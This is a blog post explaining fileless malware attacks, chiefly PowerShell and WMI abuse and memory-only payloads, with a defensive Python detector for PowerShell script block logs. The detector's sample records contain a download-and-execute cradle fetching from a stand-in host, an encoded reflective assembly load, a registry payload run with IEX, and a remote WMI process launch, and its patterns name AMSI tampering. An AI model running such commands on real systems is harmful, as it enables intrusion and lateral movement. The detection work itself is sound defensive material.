Ghost in the machine

Fileless attacks are becoming more and more prevalent. The Ponemon Institute estimates that 35% of all attacks during 2018 were fileless and, more importantly, concludes that fileless attacks are about ten times more likely to succeed than file-based attacks. The reason for this haunting reality is simple: traditional anti-virus protection relies on scanning files, and in these attacks no payload is stored on the hard drive. Another reason for the popularity of this specter is that it leaves little or no footprint on disk, making forensics after the event difficult. The inclusion of fileless methods in many exploit kits also contributes to their prevalence.

Fileless attacks operate in memory; their ghostly payload is never written to a file on the hard drive. The concept is not new: it resembles what in the early days were known as memory-resident viruses. The Lehigh virus, which appeared in 1987, was one of the first memory-resident viruses. Much later the technique became known as AVTs (Advanced Volatile Threats); other terms include non-malware attack and memory-based attack.

Malware generally performs a number of different functions, such as payload execution, data exfiltration, communication with its command and control server, lateral movement across the network, persistence, and so on. The term fileless malware refers to attacks in which at least some (but not necessarily all) of these functions are fileless, payload execution in particular. An Office macro, for example, can trigger a fileless attack whose payload then lives only in memory. Microsoft classifies three types of fileless attacks based on their degree of filelessness:

Type I: No file activity at all (for example, an exploit that injects code straight into a process and persists only in memory or firmware).
Type II: No files written to disk, but files already on the system are used indirectly (for example, a legitimate tool such as PowerShell or WMI executes the payload).
Type III: Files are required to achieve fileless persistence (for example, a script stored in the registry or a scheduled task that re-launches the in-memory payload).

Fileless attacks leverage legitimate, trusted applications already on the system. Most employ PowerShell, the tool IT administrators use for automating tasks and configuration management. McAfee found a 435% annual increase in malicious PowerShell activity. PowerShell is often harnessed to move laterally from machine to machine within an organization. WMI (Windows Management Instrumentation) is also used, both to execute commands on remote machines and to persist.

The ghost is detectable, albeit with difficulty. Without files stored on the hard drive, these attacks typically evade detection by traditional AV solutions, and forensics must be performed on volatile memory (RAM), which is hard: the malware needs to be caught red-handed, in real time, while it is still running, because after a reboot most, if not all, traces of the attack disappear like a ghost. Monitoring command-and-control connections, data exfiltration from the network, and PowerShell activity (PowerShell script block logging records the de-obfuscated content of every script block that runs) are ways of being alerted to a fileless malware attack.
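As an added example (not code from the original post), the detector below shows what "monitoring PowerShell activity" can look like in practice. It runs over a handful of constructed records modelled on the ScriptBlockText field of PowerShell script block log events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), decodes any -EncodedCommand argument from its Base64 UTF-16LE form, and flags the tradecraft the post describes: download-and-execute cradles, reflective assembly loading, WMI process creation used for lateral movement, and payloads read back from the registry. The record format, the sample scripts, the pattern list and the scoring weights are assumptions chosen for illustration; the hostnames and the example.invalid URL are constructed.

```python
"""Flag fileless-attack indicators in PowerShell script block log records.

Added example, not from the original post. The records below are constructed
to resemble Event ID 4104 ScriptBlockText entries; field names, patterns and
weights are assumptions for illustration and should be tuned before use.
"""
import base64
import re

# Indicator patterns typical of fileless PowerShell tradecraft (assumed set).
PATTERNS = {
    # "IEX (New-Object Net.WebClient).DownloadString(...)" and its inverse order
    "download_cradle": re.compile(
        r"(Invoke-Expression|\bIEX\b)[^\n]*(DownloadString|WebClient|Invoke-WebRequest)"
        r"|(DownloadString|WebClient|Invoke-WebRequest)[^\n]*(Invoke-Expression|\bIEX\b)",
        re.I),
    # Loading a .NET assembly straight from a byte array in memory
    "reflective_load": re.compile(
        r"\[(System\.)?Reflection\.Assembly\]::Load\b", re.I),
    # WMI process creation, the classic lateral-movement primitive
    "wmi_exec": re.compile(
        r"Invoke-WmiMethod|Win32_Process|Get-WmiObject|Invoke-CimMethod", re.I),
    # Payload fetched from a registry value (Type III persistence)
    "registry_payload": re.compile(r"Get-ItemProperty[^\n]*HK(LM|CU):", re.I),
    # Common AMSI tampering strings
    "amsi_tamper": re.compile(r"amsiInitFailed|AmsiUtils", re.I),
}

# Assumed weights: how strongly each indicator contributes to a record's score.
WEIGHTS = {
    "encoded_command": 2, "download_cradle": 4, "reflective_load": 4,
    "wmi_exec": 3, "registry_payload": 3, "amsi_tamper": 5,
}

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_script_block(text):
    """Return the sorted indicator names that fire on one script block."""
    hits = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.add("encoded_command")
        text = text + "\n" + decoded  # scan the decoded payload as well
    for name, pattern in PATTERNS.items():
        if pattern.search(text):
            hits.add(name)
    return sorted(hits)


def triage(records, threshold=3):
    """Score each record; return (id, score, indicators) for those at or above threshold,
    highest score first."""
    results = []
    for rec in records:
        hits = analyse_script_block(rec["script"])
        score = sum(WEIGHTS[h] for h in hits)
        if score >= threshold:
            results.append((rec["id"], score, hits))
    return sorted(results, key=lambda r: (-r[1], r[0]))


def _enc(cmd):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"id": 1, "host": "ws01", "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"id": 2, "host": "ws01", "script":
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 3, "host": "ws02", "script": "powershell.exe -nop -w hidden -enc "
        + _enc("[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)")},
    {"id": 4, "host": "ws02", "script":
        "$p=(Get-ItemProperty -Path HKCU:\\Software\\Example).payload; IEX $p"},
    {"id": 5, "host": "ws03", "script": "Invoke-WmiMethod -Class Win32_Process -Name Create "
        "-ComputerName srv01 -ArgumentList 'powershell -nop -w hidden'"},
]

if __name__ == "__main__":
    for rec_id, score, hits in triage(SAMPLE_RECORDS):
        print(f"record {rec_id}: score {score}, indicators {hits}")
```

Script block logging is off by default; it is enabled by Group Policy ("Turn on PowerShell Script Block Logging") or by setting EnableScriptBlockLogging to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, after which the 4104 events can be forwarded to a SIEM and fed to logic like the above. The patterns are deliberately simple string matches; real deployments should also account for the obfuscation (string concatenation, tick characters, format operators) that fileless tooling uses to break exactly these matches.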

The specter of fileless attacks has appeared in examples such as:

• Emotet, a banking trojan that starts from an Office macro which launches PowerShell scripts;
• Kovter, which stores its payload as JavaScript in the registry, from where it triggers PowerShell scripts;
• CactusTorch, which uses the DotNetToJScript technique to execute .NET assemblies from memory;
• August, which arrived in an Office macro and used PowerShell to load its payload into memory;
• DNSMessenger, which originated in an Office macro and used DNS queries to deliver malicious PowerShell commands;
• Duqu2, a form of fileless attack in that it removed the installer file once the malware was running in memory.

The 2017 Equifax data breach was executed by a fileless attack exploiting a remote code execution vulnerability in the Apache Struts web framework.

Fileless methods are typically employed to steal data; however, they have also been used for cryptomining and for ransomware attacks.

A few AV products, such as Microsoft’s Defender, are beginning to include some memory scanning, enabling them to catch fileless attacks that repackage known, existing techniques (such as those used by SharpShooter, for example).

However, currently, fileless attacks have largely caught traditional defence methods napping. These difficult-to-trace attacks are effective and bound to become even more prevalent. Only next generation solutions can help secure against this ghost in the machine.

One thought on “Ghost in the machine”

  1. cryptoratedump.com, September 4, 2019 at 5:02 am

    Author Stephen King used the concept of the ghost in the machine to refer to his character Blaine the Mono, the train with a split mind that runs the town of Lud in his 1991 novel
